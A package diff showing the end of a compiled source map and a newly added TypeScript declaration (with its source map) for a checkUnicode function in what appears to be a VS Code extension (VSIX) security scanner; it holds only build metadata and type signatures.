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"}

package/dist/scanner/checks/unicode.d.ts

@@ -0,0 +1,3 @@
+import type { Finding, VsixContents } from "../types.js";
+export declare function checkUnicode(contents: VsixContents): Finding[];
+//# sourceMappingURL=unicode.d.ts.map

package/dist/scanner/checks/unicode.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"unicode.d.ts","sourceRoot":"","sources":["../../../src/scanner/checks/unicode.ts"],"names":[],"mappings":"AAEA,OAAO,KAAK,EAAE,OAAO,EAAY,YAAY,EAAE,MAAM,aAAa,CAAC;AAwPnE,wBAAgB,YAAY,CAAC,QAAQ,EAAE,YAAY,GAAG,OAAO,EAAE,CAyD9D"}